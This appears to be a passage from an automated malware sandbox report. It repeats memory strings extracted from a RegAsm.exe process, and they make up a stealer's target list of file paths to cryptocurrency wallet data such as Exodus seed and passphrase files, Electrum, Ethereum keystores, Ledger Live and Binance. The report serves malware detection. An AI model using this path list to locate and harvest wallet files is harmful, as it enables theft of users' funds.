Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Exodus Web3 Wallet
Source: RegAsm.exe, 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: RegAsm.exe, 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: s Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda 